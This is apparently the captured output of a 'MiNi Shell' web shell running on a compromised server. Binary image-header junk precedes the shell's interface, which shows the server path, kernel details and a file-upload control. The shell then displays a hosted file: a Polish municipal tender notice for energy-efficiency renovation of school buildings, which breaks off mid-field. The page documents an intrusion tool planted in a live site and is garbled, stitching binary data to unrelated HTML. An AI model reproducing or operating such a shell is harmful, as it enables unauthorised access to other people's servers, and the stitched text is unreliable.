JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210511/0005161701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00051617 z dnia 2021-05-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa efektywności energetycznej budynków szkolnych na terenie Gminy Stara Błotnica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stara Błotnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670224019</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stara Błotnica 46</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stara Błotnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-806</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 385 77 90</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@starablotnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starablotnica.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa efektywności energetycznej budynków szkolnych na terenie Gminy Stara Błotnica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab5a4d8d-b24d-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00051617</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005220/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Poprawa efektywności energetycznej budynków szkolnych na terenie Gminy Stara Błotnica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.starablotnica.bip.org.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl ; gmina@starablotnica.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne zostały szczegółowo opisane w SWZ przedmiotowego postępowania oraz Regulaminie korzystania z miniPortalu oraz regulaminie ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych iw sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO", informuję, że: administratorem Pani/Pana danych osobowych jest Gmina Stara Błotnica, Stara Błotnica 46, 26-806 Stara Błotnica, tel. 48 385 77 90, e-mail: gmina@starablotnica.pl ;	inspektor ochrony danych osobowych w Gminie Stara Błotnica, e-mail: rodo@starablotnica.pl*; Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn „Poprawa efektywności energetycznej budynków szkolnych na terenie gminy Stara Błotnica.” nr B.271.3.2021 prowadzonym w trybie przetargu nieograniczonego o wartości zamówienia mniejszej od kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. — Prawo zamówień publicznych; odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. — Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843), dalej „ustawa Pzp"; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; posiada Pani/Pan: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*; na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">B.271.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a)	Część 1 – Poprawa efektywności energetycznej w budynku publicznej szkoły podstawowej im. M. Konopnickiej w miejscowości Stary Gózd działka nr ewid. 358 W ramach zadania przewiduje się wyprawę tynkarską:Wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie.Kolorystykę elewacji przedstawiono w części rysunkowej.Zakres prac budowlanych wykonywanych na podstawie niniejszej dokumentacji obejmuje:– prace wstępne, zabezpieczające i przygotowawcze;–wymiana drewnianej stolarki okiennej na PCV, kolor biały, współczynnik przenikania ciepła U ≤ 1,1 [W/(m2*K)];–wymiana stolarki okiennej na PCV, kolor biały, współczynnik przenikania ciepła U ≤ 1,1 [W/(m2*K)] okna w sali gimnastycznej – 6szt;–wymiana stolarki drzwiowej na stalową, antywłamaniową, kolor ciemny brąz, współczynnik przenikania ciepła U ≤ 1,5 [W/(m2*K)];– gruntowanie podłoża;– Wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie;– czyszczenie i naprawa tynku na cokołach wraz z wykonaniem tynku mozaikowego;– wymiana obróbek blacharskich attyk;– wymiana rynien i rur spustowych wraz z obróbkami;– wymiana wszystkich parapetów zewnętrznych na z blachy stalowej powlekanej;– wymiana parapetów wewnętrznych;– wymianę kratek wentylacyjnych na stalowe zabezpieczone antykorozyjnie;– czyszczenie i malowanie balustrad przy schodach zewnętrznych i pochylni;– czyszczenie i malowanie krat zewnętrznych okien;– czyszczenie i malowanie stalowych elementów zadaszeń nad wejściami;– czyszczenie i malowanie drewnianych elementów zadaszenia nad wejściem;– wymiana przekrycia na zadaszeniach nad wejściami do budynku;– skucie okładziny na schodach zewnętrznych z terakoty wraz z wyrównaniem podłoża, położenie nowej okładziny;– wymiana zwodów pionowych instalacji odgromowej;– wymiana zewnętrznych opraw oświetleniowych;– istniejące kraty okienne - do malowania;– montaż krat okiennych metalowych w kolorze białym – 5 szt. zgodnie z częścią rysunkową;– montaż zadaszenia nad wejściem do budynku – elewacja południowa – 1 szt.;– demontaż i montaż tablic z nr budynku i nazwą szkoły;- montaż napisu „3D” z nazwą szkoły oraz herbu gminy;– pozostałe prace budowlane i remontowe;Roboty budowlane rozbiórkowe i wyburzeniowe, obejmować będą:a)	demontaż istniejących obróbek blacharskich attyki;b)	demontaż instalacji odgromowej;c)	demontaż rynien i rur spustowych;d)	demontaż obróbek blacharskich;e)	demontaż kratek wentylacyjnych;f)	demontaż parapetów zewnętrznych i wewnętrznych;g)	demontaż stolarki okiennej i drzwiowej przeznaczonej do wymiany;h)	skucie odspojonego tynku na elewacji zewnętrznej budynku;i)	skucie okładzin schodów zewnętrznych;j)	demontaż pokrycia zadaszeń nad wejściami do budynku;k)	czyszczenie i naprawa tynku na cokole,l)	oczyszczenie rys i spękań w konstrukcji ścian zewnętrznych;m)	pozostałe roboty rozbiórkowe i towarzyszące;Roboty budowlane przygotowawcze, obejmować będą:a)	naprawa rys i spękań konstrukcji budynku;b)	gruntowanie preparatami gruntującymi;c)	wyrównanie powierzchni schodów zewnętrznych;d)	opalenie farby z elementów metalowych (balustrady);e)	pozostałe roboty przygotowawcze;Roboty budowlane i wykończeniowe, obejmować będą:a)	montaż stolarki okiennej i drzwiowej;b)	montaż parapetów wewnętrznych z konglomeratów kamiennych;c)	wykonanie zewnętrznej wyprawy elewacyjnej tynkiem silikatowo-silikonowym barwionym w masie;d)	wykonanie zewnętrznej wyprawy elewacyjnej na cokołach tynkiem silikatowo-silikonowym barwionym w masie;e)	montaż nowych obróbek blacharskich z blachy stalowej powlekanej;f)	montaż instalacji odgromowej;g)	montaż kratek wentylacyjnych;h)	montaż zewnętrznych metalowych krat okiennych – 5 sztuk;i)	montaż rynien i rur spustowych;j)	okładzina schodów zewnętrznych z terakoty;k)	malowanie stalowych elementów zadaszeń nad wejściami do budynku oraz balustrad przy schodach i pochylni;l)	montaż zadaszenia nad wejściem;m)	pozostałe roboty budowlane i wykończeniowe;Montaż instalacji fotowoltaicznych o mocy 37,08 kWp i wymiana oświetlenia na energooszczędne typu LED .Szczegółowy opis przedmiotu zamówienia stanowią projekty budowlano wykonawcze . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja” <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> b)	Część 2 – Poprawa efektywności energetycznej w budynku publicznej szkoły podstawowej im. Biskupa Jana Chrapka w miejscowości Stare Siekluki działka nr ewid. 157W ramach zadania przewiduje się wyprawę tynkarską:Wykonaniem elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie , Kolorystykę elewacji przedstawiono w części rysunkowej.Zakres prac budowlanych wykonywanych na podstawie niniejszej dokumentacji obejmuje:– prace wstępne, zabezpieczające i przygotowawcze;– gruntowanie podłoża;–wymiana drewnianej stolarki okiennej na PCV, kolor biały, współczynnik przenikania ciepła U ≤ 1,1 [W/(m2*K)];–wymiana stolarki drzwiowej na stalową, antywłamaniową, kolor ciemny brąz, współczynnik przenikania ciepła U ≤ 1,5 [W/(m2*K)];–wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie– czyszczenie i naprawa tynku na cokołach wraz z wykonaniem tynku mozaikowego;– wymiana obróbek blacharskich attyk, daszków nad wejściem, obróbki balkonów;– wymiana rynien i rur spustowych wraz z obróbkami;– wymiana wszystkich parapetów zewnętrznych na z blachy stalowej powlekanej;– wymiana parapetów wewnętrznych;– wymianę kratek wentylacyjnych na stalowe zabezpieczone antykorozyjnie;– wykonanie renowacji i malowania loggi;– czyszczenie i malowanie balustrad przy schodach zewnętrznych i na balkonach; – czyszczenie i malowanie krat w oknach;– skucie odspojonego tynku wraz z wyrównaniem podłoża;– skucie okładziny na schodach zewnętrznych i murkach przy schodach z terakoty wraz z wyrównaniem podłoża, położenie nowej okładziny;– wymiana zwodów pionowych instalacji odgromowej;– wymiana zewnętrznych opraw oświetleniowych;– demontaż i montaż tablic z nr budynku i nazwą szkoły;– montaż napisu ,,3D’’ z nazwą szkoły oraz herbu gminy na elewacji;– pozostałe prace budowlane i remontowe;Roboty budowlane rozbiórkowe i wyburzeniowe, obejmować będą:a)	demontaż istniejących obróbek blacharskich attyki;b)	demontaż instalacji odgromowej;c)	demontaż obróbek blacharskich;d)	demontaż kratek wentylacyjnych;e)	demontaż stolarki okiennej i drzwiowej przeznaczonej do wymiany;f)	demontaż parapetów zewnętrznych i wewnętrznych;g)	skucie odspojonego tynku na elewacji zewnętrznej budynku;h)	skucie okładziny na schodach zewnętrznych i pochylni;i)	oczyszczenie rys i spękań w konstrukcji ścian zewnętrznych;j)	czyszczenie i naprawa tynku na cokołach;k)	pozostałe roboty rozbiórkowe i towarzyszące;Roboty budowlane przygotowawcze, obejmować będą:a)	naprawa rys i spękań konstrukcji budynku;b)	gruntowanie preparatami gruntującymi;c)	opalenie farby z elementów metalowych;d)	pozostałe roboty przygotowawcze;Roboty budowlane i wykończeniowe, obejmować będą:a)	montaż stolarki okiennej i drzwiowej z PCV;b)	montaż parapetów wewnętrznych z konglomeratów kamiennych;c)	wykonanie zewnętrznej wyprawy elewacyjną tynkiem silikatowo-silikonowym barwionym w masie wraz z dociepleniem ościeży;d)	wykonanie zewnętrznej wyprawy elewacyjnej na cokołach tynkiem silikatowo-silikonowym barwionym w masie;e)	okładzina schodów zewnętrznych z terakoty;f)	remont murków przy schodach wejściowych z malowaniem (zeskrobanie starej farby, przeszpachlowanie nierówności, malowanie);g)	montaż nowych obróbek blacharskich z blachy stalowej powlekanej;h)	montaż rynien i rur spustowych;i)	wymiana kratek wentylacyjnych na metalowe;j)	malowanie balustrad zewnętrznych;k)	malowanie krat w oknach;l)	okładzina schodów zewnętrznych; m)	montaż instalacji odgromowej;n)	montaż napisu ,,3D’’ z nazwą szkoły oraz herbu gminy;o)	pozostałe roboty budowlane i wykończeniowe;Montaż instalacji fotowoltaicznych o mocy 13,320 kWp i wymiana oświetlenia na energooszczędne typu LED.Szczegółowy opis przedmiotu zamówienia stanowią projekty budowlano wykonawcze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy 